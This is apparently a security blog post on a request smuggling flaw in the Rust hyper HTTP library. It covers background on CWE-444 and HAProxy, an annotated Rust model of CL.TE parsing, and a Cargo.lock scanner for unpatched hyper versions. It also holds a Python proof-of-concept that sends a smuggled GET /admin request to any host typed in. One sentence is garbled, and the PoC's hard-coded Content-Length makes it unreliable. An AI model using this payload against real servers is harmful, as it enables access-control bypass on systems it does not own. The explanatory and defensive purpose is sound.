Rust Hyper Request smuggling

The exploit of the day is a request smuggling vulnerability found in the Rust HTTP library Hyper.

Firo Solutions Request Smuggling

Request Smuggling

Request smuggling is sending two requests inside one payload. Normally you visit a website and one request is sent;
with request smuggling you send a single payload of data and fool the server (more precisely, the chain of servers
between you and the application, such as a proxy and a backend) into treating it as two different requests instead of one.
This method of attacking became very popular after it was found to affect the popular HAProxy and a well-known security researcher
published a blog post about it.

HTTP request smuggling has affected a lot of software, including:

Apache Tomcat

and many more, even Squid.

It even has its own CWE (Common Weakness Enumeration) entry, CWE-444, whose definition reads: “When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to “smuggle” a request to one device without the other device being aware of it.”

An interesting discovery was made in the hyper HTTP crate.
It is a simple bug: the code that handles the “Transfer-Encoding: chunked” header of a
request handled it wrongly, so a message carrying that header (in the PoC below, next to a
Content-Length header) can be framed differently by hyper than by the other hop in the chain,
which is exactly the inconsistency that request smuggling exploits.


Nathan Davison reported a related vulnerability in HAProxy; the HAProxy fix describes it as follows:

Nathan Davison (@ndavison) reported that in legacy mode we didn't correctly
reject messages featuring a transfer-encoding header missing the "chunked"
value. The impact was limited, but if combined with "http-reuse always", it
could be used as a help to construct a content smuggling attack against a
vulnerable component employing a lenient parser which would ignore the
content-length header as soon as it sees a transfer-encoding one, without even
parsing it.

He then wrote a blog post in which he put HAProxy as a load balancer in front of a Python Flask backend
and, by exploiting the fact that HAProxy did not reject a malformed Transfer-Encoding header (one whose value is not a proper “chunked” token),
was able to carry out an HTTP request smuggling attack against the backend.
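The parsing disagreement described above (one payload, two requests; and the lenient parser in the HAProxy note that drops Content-Length as soon as it sees any Transfer-Encoding header, without checking its value) as an added Rust example. This is not code from hyper, HAProxy or the original post: the three framing policies, the constructed CL.TE payload (host example.test, smuggled GET /admin) and the Strict policy's rejection rules are assumptions chosen to illustrate the bug class in general, not the exact bytes that triggered the hyper or HAProxy issues.

```rust
// Added example, not hyper's or the page's code: a toy HTTP/1 request framer
// showing how two parsers that disagree on Content-Length versus Transfer-Encoding
// carve the same byte stream into a different number of requests.
use std::str;

#[derive(Debug, PartialEq)]
enum Framing { ContentLength(usize), Chunked, Reject }

#[derive(Clone, Copy, Debug, PartialEq)]
enum Policy {
    /// Legacy front end: honours Content-Length even when Transfer-Encoding is present.
    ContentLengthFirst,
    /// Lenient back end: drops Content-Length as soon as any Transfer-Encoding header
    /// appears, without checking its value (the parser the HAProxy note describes).
    TransferEncodingFirst,
    /// Defensive reading of RFC 7230 section 3.3.3: reject a message that carries both
    /// headers, and a Transfer-Encoding whose final coding is not "chunked".
    Strict,
}

fn header<'a>(headers: &'a [(String, String)], name: &str) -> Option<&'a str> {
    headers.iter().find(|(k, _)| k.eq_ignore_ascii_case(name)).map(|(_, v)| v.as_str())
}

/// Decide how the message body is delimited under a given policy.
fn framing(headers: &[(String, String)], policy: Policy) -> Framing {
    let te = header(headers, "transfer-encoding");
    let cl = match header(headers, "content-length").map(|v| v.parse::<usize>()) {
        None => None,
        Some(Ok(n)) => Some(n),
        Some(Err(_)) => return Framing::Reject,
    };
    match (policy, te, cl) {
        (_, None, cl) => Framing::ContentLength(cl.unwrap_or(0)),
        (Policy::ContentLengthFirst, Some(_), Some(n)) => Framing::ContentLength(n),
        (Policy::ContentLengthFirst, Some(_), None)
        | (Policy::TransferEncodingFirst, Some(_), _) => Framing::Chunked,
        (Policy::Strict, Some(_), Some(_)) => Framing::Reject,
        (Policy::Strict, Some(te), None) => {
            let last = te.rsplit(',').next().unwrap_or("").trim();
            if last.eq_ignore_ascii_case("chunked") { Framing::Chunked } else { Framing::Reject }
        }
    }
}

fn find(hay: &[u8], needle: &[u8]) -> Option<usize> {
    hay.windows(needle.len()).position(|w| w == needle)
}

/// Byte length of a chunked body, up to and including the "0\r\n\r\n" terminator.
fn chunked_len(body: &[u8]) -> Result<usize, String> {
    let mut pos = 0;
    loop {
        let rest = body.get(pos..).ok_or("truncated chunked body")?;
        let end = find(rest, b"\r\n").ok_or("truncated chunk-size line")?;
        let size_line = str::from_utf8(&rest[..end]).map_err(|e| e.to_string())?;
        let size_hex = size_line.split(';').next().unwrap_or("").trim(); // drop chunk extensions
        let size = usize::from_str_radix(size_hex, 16)
            .map_err(|_| format!("bad chunk size {:?}", size_line))?;
        pos += end + 2;
        if size == 0 {
            return Ok(pos + 2); // last-chunk plus the CRLF of an (assumed empty) trailer section
        }
        pos += size + 2; // chunk data and its CRLF
    }
}

/// Split a raw byte stream into the request lines a parser with this policy would
/// see, or the error it would raise on the first message it refuses.
fn split_requests(stream: &[u8], policy: Policy) -> Result<Vec<String>, String> {
    let mut requests = Vec::new();
    let mut pos = 0;
    while pos < stream.len() {
        let rest = &stream[pos..];
        let head_end = find(rest, b"\r\n\r\n").ok_or("truncated head")?;
        let head = str::from_utf8(&rest[..head_end]).map_err(|e| e.to_string())?;
        let mut lines = head.split("\r\n");
        let request_line = lines.next().unwrap_or("").to_string();
        let headers: Vec<(String, String)> = lines
            .filter_map(|l| l.split_once(':'))
            .map(|(k, v)| (k.trim().to_string(), v.trim().to_string()))
            .collect();
        let body_start = pos + head_end + 4;
        let body_len = match framing(&headers, policy) {
            Framing::Reject => return Err(format!("rejected {:?}", request_line)),
            Framing::ContentLength(n) => n,
            Framing::Chunked => chunked_len(&stream[body_start..])?,
        };
        if body_start + body_len > stream.len() {
            return Err("truncated body".to_string());
        }
        requests.push(request_line);
        pos = body_start + body_len;
    }
    Ok(requests)
}

/// Constructed CL.TE payload (assumption, not the page's PoC): the chunked body ends
/// at once, while Content-Length also covers the request that follows it.
fn cl_te_payload(host: &str) -> Vec<u8> {
    let smuggled = format!("GET /admin HTTP/1.1\r\nHost: {}\r\n\r\n", host);
    let body = format!("0\r\n\r\n{}", smuggled);
    format!(
        "POST / HTTP/1.1\r\nHost: {}\r\nContent-Length: {}\r\nTransfer-Encoding: chunked\r\n\r\n{}",
        host, body.len(), body
    ).into_bytes()
}

fn main() {
    let payload = cl_te_payload("example.test");
    for policy in [Policy::ContentLengthFirst, Policy::TransferEncodingFirst, Policy::Strict] {
        println!("{:?}: {:?}", policy, split_requests(&payload, policy));
    }
}
```

Run it and the same bytes come out as one request for the Content-Length front end, two requests (the second being GET /admin) for the lenient Transfer-Encoding back end, and a rejection for the strict parser; the strict policy also refuses a Transfer-Encoding such as "xchunked" that the lenient one silently accepts, which is the HAProxy case quoted above.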

PoC example exploit

import socket

# Proof of concept: one TCP payload that carries two requests. Which request the
# server sees second depends on whether it trusts Content-Length or
# Transfer-Encoding to find the end of the first body.
website = input('target host: ')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((website, 80))

# HTTP/1.1 lines end in CRLF; a bare "\n" is not a valid line terminator.
# Content-Length: 60 is hard-coded as in the original PoC. The two parsers
# disagreeing on whether this header or Transfer-Encoding delimits the body
# is the whole attack.
stuff = (
    "GET /stuff HTTP/1.1\r\n"
    "Host: {0}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 60\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "GET /admin HTTP/1.1\r\n"
    "Host: {0}\r\n"
    "Foo: xGET /home HTTP/1.1\r\n"  # "Foo: x" swallows the start of the next request
    "Host: {0}\r\n"
    "\r\n"
).format(website)

s.sendall(stuff.encode())  # the original PoC never actually sent the payload
response = s.recv(1024)    # change the size if needed
print('got back:', response)
s.close()

Check the hyper version pinned in your Cargo.toml (and Cargo.lock) files:

the hyper crate has been patched since version 0.12.34.
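One way to do that check, added here as an example that is not from the page or the hyper project: a small Rust scanner over Cargo.lock, which holds the exact versions that get built (Cargo.toml may only say hyper = "0.12"). The sample lock file and its package entries are constructed for the example; the only real input is the 0.12.34 cut-off stated above.

```rust
// Added example, not hyper's or the page's code: scan a Cargo.lock for hyper
// entries older than the release the page names as patched (0.12.34).
const PATCHED: [u64; 3] = [0, 12, 34];

/// Parse "MAJOR.MINOR.PATCH"; a pre-release or build suffix is ignored.
fn parse_version(v: &str) -> Option<[u64; 3]> {
    let core = v.split(|c: char| c == '-' || c == '+').next()?;
    let mut parts = core.split('.').map(|p| p.parse::<u64>().ok());
    Some([parts.next()??, parts.next()??, parts.next()??])
}

/// True when the version is below the patched one. A version that does not parse
/// is reported as vulnerable so that it gets looked at rather than silently skipped.
fn is_vulnerable(version: &str) -> bool {
    parse_version(version).map_or(true, |v| v < PATCHED)
}

/// Versions of the `hyper` package pinned in the lock file that are still vulnerable.
/// Only the `[[package]]`, `name = "..."` and `version = "..."` lines are read.
fn vulnerable_hyper_versions(cargo_lock: &str) -> Vec<String> {
    let mut found = Vec::new();
    let (mut name, mut version) = (None, None);
    for line in cargo_lock.lines().map(str::trim) {
        if line == "[[package]]" {
            name = None;
            version = None;
        } else if let Some(v) = line.strip_prefix("name = ") {
            name = Some(v.trim_matches('"'));
        } else if let Some(v) = line.strip_prefix("version = ") {
            version = Some(v.trim_matches('"'));
        }
        if let (Some("hyper"), Some(ver)) = (name, version) {
            if is_vulnerable(ver) {
                found.push(ver.to_string());
            }
            name = None; // entry handled; do not report it again on later lines
        }
    }
    found
}

/// Constructed sample lock file (not a real project's): two hyper versions in one
/// dependency tree, one of them still vulnerable.
const SAMPLE_CARGO_LOCK: &str = r#"
[[package]]
name = "hyper"
version = "0.12.33"
source = "registry+https://github.com/rust-lang/crates.io-index"

[[package]]
name = "hyper-tls"
version = "0.3.2"

[[package]]
name = "hyper"
version = "0.12.35"
"#;

fn main() {
    println!("vulnerable hyper versions: {:?}", vulnerable_hyper_versions(SAMPLE_CARGO_LOCK));
}
```

Two copies of hyper in one lock file is a normal situation when different dependencies pull in different versions, which is why the scan reports every entry rather than stopping at the first. For real projects, cargo audit does this against the RustSec advisory database and covers every crate, not just hyper.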

Request smuggling was also one of the challenges in a recent
capture-the-flag contest.